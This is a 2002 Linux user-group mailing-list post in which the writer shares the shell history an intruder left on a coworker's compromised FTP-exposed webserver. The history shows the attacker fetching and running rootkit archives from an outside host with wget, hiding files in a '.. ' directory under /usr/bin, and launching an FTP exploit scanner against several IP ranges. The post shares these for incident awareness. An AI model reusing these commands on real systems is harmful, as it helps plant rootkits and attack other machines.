Compromised Linux Box

Subject: Compromised Linux Box
From: Alan Caruth (saono@artificiallives.com)
Date: Mon Apr 22 2002 - 14:18:01 AKDT

• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
• Next message: Cisco: "Re: SuSe 8.0"
• Previous message: Justin Dieters: "Re: SuSe 8.0"

Hello all,
        A coworker has a webserver running on his home network which has a fairly default redhat install on it. He opened up FTP without thinking and within a short timeframe he found that he had been compromised. The person didn't clean out any logs or after he was done so it was fairly easy to track what he did.

I figured y'all might like to see the bash_history on this one. From what my coworker has said so far after looking at his other logs the attack came from an asian nation IP address. The person who hacked the machine has bunches of files on his website in case anyone is interested in finding out what all he did (or might do) in any more detail.

---bash_history on
wget
wget cage.hypermart.net/LchRk.tgz
tar zxvf LchRk.tgz
cd cage
./fuckit
rm -rf LchRk.tgz
rm -rf cage
wget cage.hypermart.net/cage.tgz
tar zxvf cage.tgz
cd cage
./install
cd /usr/bin/".. "
ls
wget cage.hypermart.net/3rwu2.tgz
tar zxvf 3rwu2.tgz
rm -rf 3rwu2.tgz
./startwu 199.112.0.0 21
./startwu 128.12.0.0 21
./startwu 128.12.100.0 21
./startwu 128.12.154.0 21
./startwu 128.95.0.0 21

--bash history off

Have a good one.
-Alan Caruth

---------
To unsubscribe, send email to <aklug-request@aklug.org>
with 'unsubscribe' in the message body.

• Next message: Cisco: "Re: SuSe 8.0"
• Previous message: Justin Dieters: "Re: SuSe 8.0"

This archive was generated by hypermail 2a23 : Mon Apr 22 2002 - 14:18:23 AKDT